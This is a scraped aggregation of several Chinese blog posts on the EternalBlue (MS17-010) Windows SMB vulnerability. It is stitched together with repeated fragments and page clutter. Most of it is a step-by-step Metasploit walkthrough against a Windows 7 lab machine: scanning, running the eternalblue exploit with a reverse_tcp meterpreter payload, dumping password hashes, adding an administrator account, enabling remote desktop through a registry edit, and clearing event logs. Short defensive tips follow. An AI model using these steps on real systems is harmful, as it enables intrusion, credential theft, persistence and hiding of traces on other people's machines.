精华内容
下载资源
问答
  • 永恒之蓝漏洞原理分析
    千次阅读
    2021-08-08 12:09:31

    漏洞利用原理

    永恒之蓝漏洞的利用原理是通过向Windows服务器的SMBv1服务发送精心构造的命令造成溢出,最终导致任意命令的执行。在Windows操作系统中,SMB服务默认是开启的,监听端口默认为445,因此该漏洞造成的影响极大。

    漏洞利用过程

    新版本的MSF默认已经集成了MS17-010漏洞的测试模块
    在这里插入图片描述
    我们使用auxiliary/scanner/smb/smb_ms17_010模块进行漏洞检测。我们使用show options查看对应的参数。我们这里得设置好一个网段,一般都是设置外网服务器的网段地址,然后线程我们这边设置50。
    在这里插入图片描述
    证明确实存在永恒之蓝漏洞
    在这里插入图片描述
    那么接下来我们就得利用漏洞利用模块了,我们使用这个exploit/windows/smb/ms17_010_eternalblue模块
    。我们得设置好对应的IP地址和反弹的Payload模块windows/x64/meterpreter/reverse_tcp
    在这里插入图片描述
    获取的直接是系统的最高权限
    在这里插入图片描述
    在meterpreter中我们输入hashdump命令,抓取当前系统中的用户散列值
    在这里插入图片描述

    防御永恒之蓝

    • 禁用SMB1协议
    • 打开Windows Update,或手动安装补丁
    • 使用防火墙阻止445端口的连接,或者使用进/出站规则阻止445端口的连接
    • 不要随意打开陌生的文件
    • 安装杀毒软件,及时更新病毒库
    更多相关内容
  • 前言 自从上次快把HEVD栈溢出的博客写完,不小心手贱点关了,...这项活动是在Shadow Brokers黑客组织披露了一系列国家安全局(NSA)漏洞后不久开始的。利用全球范围内未打补丁的系统,使用名为“ EternalBlue”的漏

    前言

    自从上次快把HEVD栈溢出的博客写完,不小心手贱点关了,结果菜鸡的我一顿操作都没找回来,就不想写博客了(后来大佬说使用windbg附加,找到那块内存,dump出来就可以还原了,自己还是太年轻呀)。隔了一个月没写博客,就感觉很多东西记不住,还是简单写写吧。

    2017年,网络安全界充斥着有关声名狼藉的WannaCry勒索软件攻击的新闻。这项活动是在Shadow Brokers黑客组织披露了一系列国家安全局(NSA)漏洞后不久开始的。利用全球范围内未打补丁的系统,使用名为“ EternalBlue”的漏洞的WannaCry攻击遍及150个国家。自2016年以来,臭名昭著的Shadow Brokers黑客组织一直活跃,并负责泄漏一些NSA漏洞,零时差和黑客工具。根据Wikipedia的报道,影子经纪人组织迄今已报告了五次泄漏。第五次泄漏发生在2017年4月14日,被证明是最具破坏性的。当天,Microsoft发布了一篇博客文章,概述了可用的补丁程序,这些补丁程序已解决了Shadow Brokers泄露的漏洞。漏洞发生前一个月(2017年3月14日),Microsoft已发布安全公告MS17-010,该公告解决了一些未修补的漏洞,包括“ EternalBlue”漏洞所利用的漏洞。但是,许多用户未应用该补丁,并且在2017年5月12日遭到了历史上最大的勒索软件攻击– WannaCry攻击。WannaCry成功感染了150多个国家的23万多台计算机后,引起了全球关注。这次袭击的主要受害者是全球知名的组织,包括医院和电信,天然气,电力和其他公用事业提供商。WannaCry爆发后不久,发生了其他严重的攻击,这些攻击也被发现使用了EternalBlue以及来自同一NSA泄漏的其他漏洞利用和黑客工具。

    Shadow Brokers Group
    Shadow Brokers组织以NSA泄漏而闻名,其中包含漏洞利用,零时差和黑客工具。该小组的第一个已知泄漏发生在2016年8月。在最近一次泄漏之后,Shadow Brokers组改变了其业务模式并开始进行付费订阅。在该组织造成的所有公开泄漏中,第五次泄漏-包括许多网络攻击中使用的EternalBlue漏洞-创造了历史。

    EternalBlue(永恒之蓝)据称是方程式组织在其漏洞利用框架中一个针对SMB服务进行攻击的模块,由于其涉及漏洞的影响广泛性及利用稳定性,在被公开以后为破坏性巨大的勒索蠕虫WannaCry所用而名噪一时。
     

    模拟环境:

    1、使用GNS3配合VMware搭建三个模拟器,使用不同网段、不同网络适配器搭建,wind7使用 vm_net 1网卡模拟内网,KALL使用VM_net 8 模拟外网进行永恒之蓝漏洞攻击

    漏洞利用原理


    永恒之蓝漏洞的利用原理是通过向Windows服务器的SMBv1服务发送精心构造的命令造成溢出,最终导致任意命令的执行。在Windows操作系统中,SMB服务默认是开启的,监听端口默认为445,因此该漏洞造成的影响极大。

    漏洞利用过程
    新版本的MSF默认已经集成了MS17-010漏洞的测试模块

    我们使用auxiliary/scanner/smb/smb_ms17_010模块进行漏洞检测。我们使用show options查看对应的参数。我们这里得设置好一个网段,一般都是设置外网服务器的网段地址,然后线程我们这边设置50。

    证明确实存在永恒之蓝漏洞

    那么接下来我们就得利用漏洞利用模块了,我们使用这个exploit/windows/smb/ms17_010_eternalblue模块
    。我们得设置好对应的IP地址和反弹的Payload模块windows/x64/meterpreter/reverse_tcp

    获取的直接是系统的最高权限

    在meterpreter中我们输入hashdump命令,抓取当前系统中的用户散列值

    防御永恒之蓝


    1、禁用SMB1协议
    2、打开Windows Update,或手动安装补丁
    3、‘使用防火墙阻止445端口的连接,或者使用进/出站规则阻止445端口的连接
    4、不要随意打开陌生的文件
    5、安装杀毒软件,及时更新病毒库

     

    展开全文
  • MS17-010(永恒之蓝漏洞分析与复现

    万次阅读 多人点赞 2021-09-18 23:59:08
    文章目录一、漏洞简介1、永恒之蓝介绍:2、漏洞原理:3、影响版本:二、漏洞复现复现环境:复现过程:1、主机发现:2、使用MSF的永恒之蓝漏洞模块3、使用ms17-010扫描模块,对靶机进行扫描:4、使用ms17-010攻击模块...

    一、漏洞简介

    1、永恒之蓝介绍:

    永恒之蓝漏洞(MS17-010),它的爆发源于 WannaCry 勒索病毒的诞生,该病毒是不法分子利用NSA(National Security Agency,美国国家安全局)泄露的漏洞 “EternalBlue”(永恒之蓝)进行改造而成 。勒索病毒的肆虐,俨然是一场全球性互联网灾难,给广大电脑用户造成了巨大损失。据统计,全球100多个国家和地区超过10万台电脑遭到了勒索病毒攻击、感染。

    2、漏洞原理:

    永恒之蓝漏洞通过 TCP 的445和139端口,来利用 SMBv1 和 NBT 中的远程代码执行漏洞,通过恶意代码扫描并攻击开放445文件共享端口的 Windows 主机。只要用户主机开机联网,即可通过该漏洞控制用户的主机。不法分子就能在其电脑或服务器中植入勒索病毒、窃取用户隐私、远程控制木马等恶意程序。

    3、影响版本:

    目前已知受影响的 Windows 版本包括但不限于:WindowsNT,Windows2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server 2012 SP0。

    二、漏洞复现

    复现环境:

    • 攻击机:Linux kali(IP:192.168.50.130)

    • 靶机:Windows 7 Enterprise with Service Pack 1 (x64)(IP:192.168.50.132)

    实验条件:两台机子可以相互ping通,并且靶机(无补丁)开启了445端口,防火墙是关闭的!

    复现过程:

    1、主机发现:

    登录 kali linux,用 nmap 探测本网段存活主机

    nmap 192.168.50.0/24
    

    在这里插入图片描述
    可以看到,靶机的445端口是开放的,而永恒之蓝利用的就是445端口的SMB服务,操作系统溢出漏洞。

    2、使用MSF的永恒之蓝漏洞模块

    打开MSF:msfconsole
    在这里插入图片描述
    MSF每次打开都会有一个随机的界面,花里胡哨的,不过我喜欢 ~( ̄▽ ̄)~

    搜索 ms17-010 代码:search ms17_010
    在这里插入图片描述

    这里可以得到一些工具,其中
    auxiliary/scanner/smb/smb_ms17_010 是永恒之蓝扫描模块, exploit/windows/smb/ms17_010_eternalblue 是永恒之蓝攻击模块。
    一般配合使用,前者先扫描,若显示有漏洞,再进行攻击。

    3、使用ms17-010扫描模块,对靶机进行扫描:

    使用模块:

    use auxiliary/scanner/smb/smb_ms17_010
    

    设置目标IP或网段:

    set rhosts 192.168.50.132
    

    执行扫描:run
    在这里插入图片描述
    如果出现以上情况,就说明存在漏洞。

    4、使用ms17-010攻击模块,对靶机进行攻击

    使用模块:

    use exploit/windows/smb/ms17_010_eternalblue
    

    设置攻击目标IP

    set rhosts 192.168.50.132
    

    可以使用 show options 命令查看设置选项

    在这里插入图片描述
    执行攻击:exploit 或 run
    在这里插入图片描述
    攻击完成!

    5、得到靶机shell

    在这里插入图片描述
    输入:chcp 65001 可解决乱码问题。
    在这里插入图片描述
    解决了,但是没有完全解决。

    6、通过shell对靶机进行控制

    1、创建新用户 ,语法:net user 用户名 密码 /add

    输入:

    net user sss 123456 /add
    

    查看用户信息,命令:net user
    在这里插入图片描述
    可以看到添加成功了。

    2、将用户sss添加至管理员组

    net localgroup administrators sss /add
    

    在这里插入图片描述
    3、开启远程桌面功能

    查看3389端口状态:netstat -ano
    在这里插入图片描述
    看到3389端口并没有开启,开启3389端口,命令:

    REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
    

    在这里插入图片描述
    3389端口开启。

    4、远程桌面连接靶机

    rdesktop 192.168.50.132:3389
    

    在这里插入图片描述
    使用创建的sss用户进行登录
    在这里插入图片描述
    登陆成功!
    在这里插入图片描述
    上面这是一个简单的演示,告诉大家这个漏洞很危险,真正的攻击能做的事情更多。

    展开全文
  • 永恒之蓝漏洞(MS17-010),它的爆发源于 WannaCry 勒索病毒的诞生,该病毒是不法分子利用美国国家安全局泄露的漏洞 “EternalBlue”(永恒之蓝)进行改造而成 ,“永恒之蓝”是利用Windows系统的SMB漏洞来获取...

    目录

    一、漏洞简介

    1、永恒之蓝:

    2、漏洞原理:

    3、影响版本:

    二、复现环境

    三、漏洞复现

    1、使用kali自带的nmap对靶机进行端口扫描,扫描到445端口处于开放状态

    2、启动kali自带的msf,显示msf6>后说明已经进入msf了

    3、搜寻永恒之蓝漏洞(MS17-010)可使用的攻击模块

    4、使用相应模块auxiliary/scanner/smb/smb_ms17_010对靶机进行验证,验证靶机是否存在永恒之蓝漏洞(MS17-010),可直接使用模块前面对应的数字,效果相同

    5、查询配置,yes 全部需要手动配置,配置已经存在的,可以使用它给的默认配置也可以对该配置进行更改,no 就无需理会

    6、使用exploit或run命令进行攻击,显示靶机存在永恒之蓝漏洞(MS17-010)

    7、正式开始攻击。换用攻击模块exploit/windows/smb/ms17_010_eternalblue对应前面的数字为0(我的此攻击模块对应前面的数字是0)

    8.使用exploit或run命令进行攻击,这时靶机会反弹一个会话,然后可以进行下一步操作,比如查看靶机版本信息或者获取靶机的shell权限等

    9、对靶机进行一系列操作

    四、永恒之蓝漏洞解决办法

    一、漏洞简介

    1、永恒之蓝:

    永恒之蓝漏洞(MS17-010),它的爆发源于 WannaCry 勒索病毒的诞生,该病毒是不法分子利用美国国家安全局泄露的漏洞 “EternalBlue”(永恒之蓝)进行改造而成 ,“永恒之蓝”是利用Windows系统的SMB漏洞来获取Windows系统的最高权限。

    2、漏洞原理:

    永恒之蓝漏洞通过 TCP 的445和139端口,来利用 SMBv1 和 NBT 中的远程代码执行漏洞,通过恶意代码扫描并攻击开放445文件共享端口的 Windows 主机。只要用户主机开机联网,即可通过该漏洞控制用户的主机。不法分子就能在其电脑或服务器中植入勒索病毒、窃取用户隐私、远程控制木马等恶意程序。

    补充:

    “445端口是TCP共享服务 445端口它将尝试同时连接到端口139和445。如果端口445有响应,它将向端口139发送TCPRST数据包,以断开并继续与端口455的通信;当端口445没有响应时,使用端口139。”

    “139 NetBIOS File and Print Sharing 通过这个端口进入的连接试图获得NetBIOS/SMB服务。这个协议被用于Windows"文件和打印机共享"和SAMBA。在Internet上共享自己的硬盘可能是最常见的问题。139属于TCP协议。”

    3、影响版本:

    目前已知受影响的 Windows 版本包括但不限于:WindowsNT,Windows2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server 2012 SP0。

    二、复现环境

    攻击机:kali-Linux-2022.2(IP:192.168.50.133/24)

    靶机:Windows 7(IP:192.168.50.159/24)

    kali-Linux-2022.2镜像下载地址:https://www.kali.org/get-kali/#kali-bare-metal

    Windows 7镜像下载地址:https://msdn.itellyou.cn/

    kali-Linux-2022.2和Windows 7能够相互ping通,Windows 7靶机关闭防火墙,开启445端口(默认端口开启),Windows 7靶机不要打补丁

    三、漏洞复现

    1、使用kali自带的nmap对靶机进行端口扫描,扫描到445端口处于开放状态

    nmap 192.168.50.159

    2、启动kali自带的msf,显示msf6>后说明已经进入msf了

    msfconsole

    3、搜寻永恒之蓝漏洞(MS17-010)可使用的攻击模块

    search ms17-010

    4、使用相应模块auxiliary/scanner/smb/smb_ms17_010对靶机进行验证,验证靶机是否存在永恒之蓝漏洞(MS17-010),可直接使用模块前面对应的数字,效果相同

    use 3

    5、查询配置,yes 全部需要手动配置,配置已经存在的,可以使用它给的默认配置也可以对该配置进行更改,no 就无需理会

    show options

    我这里只需配置RHOSTS(靶机IP地址)就行了,其他默认

    set rhosts 192.168.50.159

    配置有效载荷,该步的作用是攻击机扫描完后,使靶机反弹回一个会话给攻击机建立连接

    set payload windows/x64/meterpreter/reverse_tcp

    6、使用exploit或run命令进行攻击,显示靶机存在永恒之蓝漏洞(MS17-010)

    exploit

    7、正式开始攻击。换用攻击模块exploit/windows/smb/ms17_010_eternalblue对应前面的数字为0(我的此攻击模块对应前面的数字是0)

    use 0

    重复第5步步骤,注意:执行show options命令后查看到yes对应的地方如果是空的需要全部配上

    8.使用exploit或run命令进行攻击,这时靶机会反弹一个会话,然后可以进行下一步操作,比如查看靶机版本信息或者获取靶机的shell权限等

    run

    9、对靶机进行一系列操作

    查看系统信息

    sysinfo

    反弹shell

    shell

    可以创建用户

    net user xxxx 1234 /add(xxxx用户名 1234密码)

    net localgroup administrators xxxx /add (将用户设置为管理员权限)

    net user

    得到账户hash,解码可以得到密码

    hashdump

    找到显示的路径可以看到受害者屏幕截图

    screenshot

    显示成功

    记得保持清除日志的好习惯

    clearev

    四、永恒之蓝漏洞解决办法

    1、开启防火墙

    2、对系统进行升级或者打补丁

    3、关闭相应的端口

    展开全文
  • 永恒之蓝漏洞与勒索病毒Wannacry研究

    千次阅读 2022-04-26 23:22:37
    永恒之蓝漏洞与Wannacry病毒家族
  • 最近WannaRen勒索软件爆发(下图是安天的分析攻击流程),其名称和功能与WannaCry相似,所以接下来作者将连续分享WannaCry勒索病毒的复现及分析,第一篇文章将采用Github资源实现永恒之蓝漏洞利用及Windows7系统文件...
  • 永恒之蓝漏洞解析

    千次阅读 2019-10-27 23:36:40
    Microsoft Windows 7/2008 R2 - ‘EternalBlue’ SMB Remote Code Execution (MS17-010)“永恒之蓝漏洞原理 一、漏洞概况 1、简介 永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批...
  • 本次实验主要是利用永恒之蓝漏洞对windows7进行控制利用,掌握Metaploit工具的使用,知道永恒之蓝的漏洞利用原理。 实验原理 永恒之蓝是在Windows的SMB服务处理SMB v1 请求时发生的漏洞,这个漏洞导致攻击者在目标...
  • 原标题:Linux版“永恒之蓝”远程代码执行漏洞技术分析一、漏洞描述Samba是一套可使UNIX系列的操作系统与微软Windows操作系统的SMB/CIFS网络协议做连结的自由软件。这个漏洞使得Samba客户端可以主动上传共享库到...
  • 永恒之蓝漏洞复现

    千次阅读 2022-01-07 23:26:35
    漏洞简介: 永恒之蓝(EternalBlue)是由美国国家安全局开发的漏洞利用程序,对应微软漏洞编号ms17...由于利用永恒之蓝漏洞利用工具进行传播病毒木马事件多,影响特大,因此很多时候默认将ms17-010漏洞称为“永恒之蓝”。
  • WannaCry勒索软件中,利用了NSA泄露工具中的“永恒之蓝漏洞,关于这个漏洞,之前已经有一些分析,在我看的文章中,http://blogs.360.cn/360safe/2017/04/17/nsa-eternalblue-smb/说得最详细,该文章中针对win7 32...
  • 漏洞分析】MS17-010:深入分析永恒之蓝漏洞

    万次阅读 多人点赞 2018-10-03 15:38:21
    背景 从EternalBlue这个Exploit被影子经纪人公布到互联网上后,就成为了“明星”。...EternalBlue(在微软的MS17-010中被修复)是在Windows的SMB服务处理SMB v1请求时发生的漏洞,这个漏洞导致攻击者在目标...
  • 永恒之蓝ms17-010漏洞利用复现

    千次阅读 2022-04-15 21:42:30
    永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造...
  • 永恒之蓝漏洞复现(CVE-2017-0146)

    千次阅读 2022-04-03 19:21:03
    前言 永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具...利用ms17-010中的扫描模块和攻击模块进行,首先通过扫描模块判断是否存在永恒之蓝漏洞
  • 永恒之蓝 MS17-010漏洞复现

    万次阅读 多人点赞 2018-10-07 11:01:17
    永恒之蓝漏洞是方程式组织在其漏洞利用框架中一个针对SMB服务进行攻击的漏洞,该漏洞导致攻击者在目标系统上可以执行任意代码。 注:SMB服务的作用:该服务在Windows与UNIX系列OS之间搭起一座桥梁,让两者的资源可...
  • 漏洞复现(一):永恒之蓝(ms17-010)

    千次阅读 多人点赞 2021-11-02 21:38:47
    漏洞原理 漏洞危害 漏洞复现 实验环境 完整过程 扫描目标主机是否存在该漏洞 实施攻击 漏洞利用 漏洞防御 永恒之蓝简介 永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议...
  • 1. 了解MSF框架的使用方法。 2. 了解永恒之蓝漏洞
  • SMB协议——永恒之蓝漏洞利用

    万次阅读 2019-03-06 21:28:07
    SMB — 永恒之蓝漏洞利用 1、实验环境: 攻击机:kali IP:192.168.247.158 被攻击机:Win 7 IP:192.168.247.150 2、实验步骤: 被攻击机Win 7: 在被攻击机Win 7中开启SMB1,HKEY_LOCAL_MACHINE/SYSTEM/...
  • 姓名:软工女孩(b站同名) ...5. 掌握永恒之蓝的使用以及msf模块的使用 6. 掌握基本提权与后门维持 五、实验步骤 1、搭建好环境准备,在WMware虚拟机软件中分别建立以kali和win7为镜像的虚拟机,按
  • EternalBlue(永恒之蓝)据称是方程式组织在其漏洞利用框架中一个针对SMB服务进行攻击的模块,由于其涉及漏洞的影响广泛性及利用稳定性,在被公开以后为破坏性巨大的勒索蠕虫 WannaCry所用而名噪一时。360威胁情报...
  • 2017年5月24日Samba发布了4.6.4版本,中间修复了一个严重的远程代码执行漏洞漏洞编号CVE-2017...360网络安全中心和360信息安全部的GearTeam第一时间对该漏洞进行了分析,确认属于严重漏洞,可以造成远程代码执行。...
  • 查看资料 ms17-10漏洞利用的步骤大致如下 打开msf use auxiliary/scanner/smb/smb_ms17_010 msf exploit(ms17_010_eternalblue) > use exploit/windows/smb/ms17_010_eternalblue msf exploit(ms17_010_...
  • SMB协议利用之ms17-010-永恒之蓝漏洞抓包分析SMB协议 实验环境: Kali msf以及wireshark Win7开启网络共享(SMB协议) 实验步骤: 1、查看本机数据库是否开启,发现数据库是关闭的,需要开启   2、打开本机数据库...
  • 文章目录扫描技术扫描神器资产发现主机发现:端口扫描:网络漏洞扫描OpenVAS的使用AWVS的安装与使用永恒之蓝漏洞复现 扫描技术 扫描 自动化 提高效率 扫描神器 nmap,跨平台使用 官网:https://nmap.org 如果使用...
  • 永恒之蓝
  • 前文分享了Vulnhub靶机渗透的DC-1题目,通过信息收集、CMS漏洞搜索、Drupal漏洞利用、Metasploit反弹shell、提权及数据库爆破获取flag。这篇文章将分享新知识,最近WannaRen勒索软件爆发(下图是安天的分析攻击流程...
  • 复现永恒之蓝

    2021-12-15 11:16:13
    永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 406
精华内容 162
热门标签
关键字:

永恒之蓝漏洞原理分析